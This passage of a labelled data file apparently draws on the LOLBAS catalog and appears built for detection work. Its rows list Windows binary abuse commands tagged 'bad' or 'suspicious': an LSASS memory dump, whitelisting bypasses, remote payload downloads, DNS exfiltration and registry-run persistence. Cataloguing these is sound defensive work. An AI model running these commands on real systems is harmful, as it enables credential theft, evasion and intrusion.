installed,0.85,False,dotnet.exe will execute any DLL even if applocker is enabled.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ff0bc657b3a2c2edf48602f3,dotnet.exe fsi,dotnet.exe fsi,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dotnet.yml,Dotnet.exe,Execute,"[""T1059"", {""Execute"": ""FSharp""}]",Windows 10 and up with .NET SDK installed,0.85,False,dotnet.exe will open a console which allows for the execution of arbitrary F# commands,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 61c5c583a814653dd9f64a64,dotnet.exe msbuild {PATH:.csproj},dotnet.exe msbuild {PATH:.csproj},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Dotnet.yml,Dotnet.exe,AWL Bypass,"[""T1218"", {""Execute"": ""CSharp""}]",Windows 10 and up with .NET Core installed,0.85,False,dotnet.exe with msbuild (SDK Version) will execute unsigned code,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ffc4b625d6acc20305bb4039,ECMangen.exe {REMOTEURL},ECMangen.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/ECMangen.yml,ECMangen.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 67f21e477578b244aa7caa16,winword.exe {REMOTEURL},winword.exe {REMOTEURL},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Winword.yml,Winword.exe,Download,"[""T1105"", {""Download"": ""INetCache""}]",Windows,0.85,False,Downloads payload from remote server,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0a4b98f4eb96258d28479abf,te.exe {PATH:.wsc},te.exe {PATH:.wsc},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Te.yml,te.exe,Execute,"[""T1127"", {""Execute"": ""WSH""}]",Windows,0.85,False,Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f7792abaabf0a9507f1c66b7,te.exe {PATH:.dll},te.exe {PATH:.dll},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Te.yml,te.exe,Execute,"[""T1127"", {""Execute"": ""DLL""}, {""Input"": ""Custom Format""}]",Windows,0.85,False,Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8be50f17219b3c0796a7f082,AppLauncher.exe {PATH_ABSOLUTE:.exe},AppLauncher.exe {PATH_ABSOLUTE:.exe},bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/AppLauncher.yml,AppLauncher.exe,Execute,"[""T1127"", {""Execute"": ""EXE""}]",Windows,0.85,False,Launches an executable via User Experience Virtualization tool.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 75cd63b6ff862b1dcb843a4a,TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000,TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OtherMSBinaries/Testwindowremoteagent.yml,TestWindowRemoteAgent.exe,Upload,"[""T1048""]","Windows 10, Windows 11",0.85,False,"Sends DNS query for open connection to any host, enabling exfiltration over DNS",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 271865ded2c7fb7ba0742607,"rundll32.exe ""C:\Program Files\Windows Photo Viewer\PhotoViewer.dll"",ImageView_Fullscreen {REMOTEURL}","rundll32.exe ""C:\Program Files\Windows Photo Viewer\PhotoViewer.dll"",ImageView_Fullscreen {REMOTEURL}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/PhotoViewer.yml,PhotoViewer.dll,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,"Once executed, rundll32.exe will download the file at the specified URL to the user's INetCache folder using the Windows Photo Viewer DLL.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 78e7505351dea8fe4863e85e,"rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}","rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Shell32.yml,Shell32.dll,Execute,"[""T1218.011"", {""Execute"": ""DLL""}]","Windows 10, Windows 11",0.85,False,Launch a DLL payload by calling the Control_RunDLL function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 039213864b4229e19297a1ae,"rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}","rundll32.exe shell32.dll,ShellExec_RunDLL {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Shell32.yml,Shell32.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable by calling the ShellExec_RunDLL function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e4b38422aa11875c55e6d18b,"rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}","rundll32 SHELL32.DLL,ShellExec_RunDLL {PATH:.exe} {CMD:args}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Shell32.yml,Shell32.dll,Execute,"[""T1218.011"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Launch command line by calling the ShellExec_RunDLL function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d1250089eb8cdc29dd6fa7da,"rundll32.exe shell32.dll,#44 {PATH:.dll}","rundll32.exe shell32.dll,#44 {PATH:.dll}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Shell32.yml,Shell32.dll,Execute,"[""T1218.011"", {""Execute"": ""DLL""}]","Windows 10, Windows 11",0.85,False,Load a DLL/CPL by calling undocumented Control_RunDLLNoFallback function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 07830052b0052ef424d89a9d,"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}","rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Url.yml,Url.dll,Execute,"[""T1218.011"", {""Execute"": ""HTA""}]","Windows 10, Windows 11",0.85,False,Launch a HTML application payload by calling OpenURL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3d6075c086b5c845d0cb1965,"rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}","rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Url.yml,Url.dll,Execute,"[""T1218.011"", {""Execute"": ""URL""}]","Windows 10, Windows 11",0.85,False,Launch an executable payload via proxy through a .url (information) file by calling OpenURL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6620fad0b2912f5051e0842e,"rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Url.yml,Url.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable by calling OpenURL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 24e3d6e940585ef8ee950ebc,"rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}","rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Url.yml,Url.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable by calling FileProtocolHandler.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c58bb89123aad41bb488f1a1,"rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Url.yml,Url.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable by calling FileProtocolHandler.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d3ecd4361fb3ca737bf3d8fa,"rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta","rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Url.yml,Url.dll,Execute,"[""T1218.011"", {""Execute"": ""HTA""}]","Windows 10, Windows 11",0.85,False,Launch a HTML application payload by calling FileProtocolHandler.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 62a48f386b91567d5340532f,"rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}","rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Shdocvw.yml,Shdocvw.dll,Execute,"[""T1218.011"", {""Execute"": ""URL""}]","Windows 10, Windows 11",0.85,False,Launch an executable payload via proxy through a URL (information) file by calling OpenURL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0edd22bebbe541f91e958596,"rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}","rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Shimgvw.yml,Shimgvw.dll,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,"Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 53a25f9292f4f599b313e29c,"rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}","rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Scrobj.yml,Scrobj.dll,Download,"[""T1105"", {""Download"": ""INetCache""}]","Windows 10, Windows 11",0.85,False,"Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c91e564af85e3a430bc7b613,"rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}","rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Pcwutl.yml,Pcwutl.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch executable by calling the LaunchApplication function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0b4c0fa4a4b0fb2027265195,"rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}","rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Ieframe.yml,Ieframe.dll,Execute,"[""T1218.011"", {""Execute"": ""URL""}]","Windows 10, Windows 11",0.85,False,Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1207d9d878cd481a9f17b705,"rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}","rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Syssetup.yml,Syssetup.dll,AWL Bypass,"[""T1218.011"", {""Execute"": ""INF""}]","Windows 10, Windows 11",0.85,False,Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3b89b7abde8cfc1131370222,rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full,rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/comsvcs.yml,Comsvcs.dll,Dump,"[""T1003.001""]","Windows 10, Windows 11",0.85,False,"Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 385cdffd0852e74a5867042e,"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,","rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Advpack.yml,Advpack.dll,AWL Bypass,"[""T1218.011"", {""Execute"": ""INF""}]","Windows 10, Windows 11",0.85,False,Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7dcb8d74f018ec9b704a54a7,"rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,","rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},,1,",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Advpack.yml,Advpack.dll,AWL Bypass,"[""T1218.011"", {""Execute"": ""INF""}]","Windows 10, Windows 11",0.85,False,Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3c722ff3d170901589f7122c,"rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}","rundll32.exe advpack.dll,RegisterOCX {PATH:.dll}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Advpack.yml,Advpack.dll,Execute,"[""T1218.011"", {""Execute"": ""DLL""}]","Windows 10, Windows 11",0.85,False,Launch a DLL payload by calling the RegisterOCX function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d6a27fc66d1c1d1224fb521e,"rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}","rundll32.exe advpack.dll,RegisterOCX {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Advpack.yml,Advpack.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable by calling the RegisterOCX function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 48baca443d2222ee63bbddb1,"rundll32 advpack.dll, RegisterOCX {CMD}","rundll32 advpack.dll, RegisterOCX {CMD}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Advpack.yml,Advpack.dll,Execute,"[""T1218.011"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Launch command line by calling the RegisterOCX function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7873cd916c90f0a6fb451d0d,"rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}","rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Setupapi.yml,Setupapi.dll,AWL Bypass,"[""T1218.011"", {""Execute"": ""INF""}]","Windows 10, Windows 11",0.85,False,Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f13a4283d837d96b5338614b,"rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}","rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Zipfldr.yml,Zipfldr.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable payload by calling RouteTheCall.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 83df83343bc3b6413a1547fa,"rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e","rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Zipfldr.yml,Zipfldr.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable payload by calling RouteTheCall (obfuscated).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 88ca9dabffdee40d2ef64420,"rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}","rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Mshtml.yml,Mshtml.dll,Execute,"[""T1218.011"", {""Execute"": ""HTA""}]","Windows 10, Windows 11",0.85,False,Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fa6d38162f1561596a4c3c1d,"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,","rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Ieadvpack.yml,Ieadvpack.dll,AWL Bypass,"[""T1218.011"", {""Execute"": ""INF""}]","Windows 10, Windows 11",0.85,False,Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 495304936f80abca1b9855eb,"rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,","rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},,1,",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Ieadvpack.yml,Ieadvpack.dll,AWL Bypass,"[""T1218.011"", {""Execute"": ""INF""}]","Windows 10, Windows 11",0.85,False,Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 59a7916570fd27f995e5dea6,"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}","rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.dll}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Ieadvpack.yml,Ieadvpack.dll,Execute,"[""T1218.011"", {""Execute"": ""DLL""}]","Windows 10, Windows 11",0.85,False,Launch a DLL payload by calling the RegisterOCX function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e4cbdbe1126bea6e820c2690,"rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}","rundll32.exe ieadvpack.dll,RegisterOCX {PATH:.exe}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Ieadvpack.yml,Ieadvpack.dll,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable by calling the RegisterOCX function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review af5ca67fb240938abf08eeb3,"rundll32 ieadvpack.dll, RegisterOCX {CMD}","rundll32 ieadvpack.dll, RegisterOCX {CMD}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Ieadvpack.yml,Ieadvpack.dll,Execute,"[""T1218.011"", {""Execute"": ""CMD""}]","Windows 10, Windows 11",0.85,False,Launch command line by calling the RegisterOCX function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bcec3ecdc6c410eb582bffbe,"rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}","rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Desk.yml,Desk.cpl,Execute,"[""T1218.011"", {""Execute"": ""EXE""}]","Windows 10, Windows 11",0.85,False,Launch an executable with a .scr extension by calling the InstallScreenSaver function.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b40577b9b5d722cb470989c5,"rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}","rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Desk.yml,Desk.cpl,Execute,"[""T1218.011"", {""Execute"": ""EXE""}, {""Execute"": ""Remote""}]","Windows 10, Windows 11",0.85,False,"Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 745549c22f6aedf016514479,"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,yml/OSLibraries/Dfshim.yml,Dfshim.dll,AWL Bypass,"[""T1127.002"", {""Execute"": ""ClickOnce""}, {""Execute"": ""Remote""}]","Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11",0.85,False,"Executes click-once-application from URL (trampoline for Dfsvc.exe, DotNet ClickOnce host)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6a1bbb211ed2212366de585e,RunCmd_X64 file.cmd /F,RunCmd_X64 file.cmd /F,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml,RunCmd_X64.exe,Execute,"[""T1218""]","Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10",0.85,False,Launch command file and hide the console window,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cb99baf33f8c0fc25fc8d561,Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary,Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/AcroRd32.yml,AcroRd32.exe,,"[""""]",,0.85,False,Hijack RdrCEF.exe with a payload executable to launch when opening Adobe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a90f5f70f0098d67d25ccee,Replace ROCCAT_Swarm_Monitor.exe with your binary.exe,Replace ROCCAT_Swarm_Monitor.exe with your binary.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml,ROCCAT_Swarm.exe,,"[""""]",,0.85,False,Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bf9e2ebcdc5392a52339dd05,Run Setup.exe,Run Setup.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Setup.yml,Setup.exe,,"[""""]",,0.85,False,Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 73f7b4a3b562e125502ae669,Nvudisp.exe System calc.exe,Nvudisp.exe System calc.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml,Nvudisp.exe,,"[""""]",,0.85,False,Execute calc.exe as a subprocess.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 428a29512f92ca59272becef,"Nvudisp.exe Copy test.txt,test-2.txt","Nvudisp.exe Copy test.txt,test-2.txt",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml,Nvudisp.exe,,"[""""]",,0.85,False,Copy fila A to file B.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d57aad8f06d1ad95740931c9,Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe,Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml,Nvudisp.exe,,"[""""]",,0.85,False,Add/Edit a Registry key value.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 25db484e62592cecc6ca144c,"Nvudisp.exe CreateShortcut test.lnk,""Test"",""c:\windows\system32\calc.exe\"","""",""c:\windows\system32\""","Nvudisp.exe CreateShortcut test.lnk,""Test"",""c:\windows\system32\calc.exe\"","""",""c:\windows\system32\""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml,Nvudisp.exe,,"[""""]",,0.85,False,Create shortcut file.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d4b7c7879de7fdfde488f0e1,Nvudisp.exe KillApp calculator.exe,Nvudisp.exe KillApp calculator.exe,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml,Nvudisp.exe,,"[""""]",,0.85,False,Kill a process.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 457f34c335180d452683e9c2,Nvudisp.exe Run foo,Nvudisp.exe Run foo,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml,Nvudisp.exe,,"[""""]",,0.85,False,Run process,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1717ff0b2fb2b8a3e7f56513,VBoxDrvInst.exe driver executeinf c:\temp\calc.inf,VBoxDrvInst.exe driver executeinf c:\temp\calc.inf,bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/VBoxDrvInst.yml,VBoxDrvInst.exe,,"[""""]",,0.85,False,Set registry key-value for persistance via INF file call through VBoxDrvInst.exe,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 82d16ebaeb0c531224434553,"Update.exe --processStart payload.exe --process-start-args ""whatever args""","Update.exe --processStart payload.exe --process-start-args ""whatever args""",bad,bad,plain,suspicious,catalog_example,lolbas,LOLBAS-Project/LOLBAS,Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml,Update.exe,Execute,"[""T1218""]",Windows 7 and up with Whatsapp installed,0.85,False,"Copy your payload into ""%localappdata%\Whatsapp\app-[version]\"". Then run the command. Update.exe will execute the file you copied.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6f13cc90beac1698e02bfa52,nvuhda6.exe System calc.exe,nvuhda6.exe System 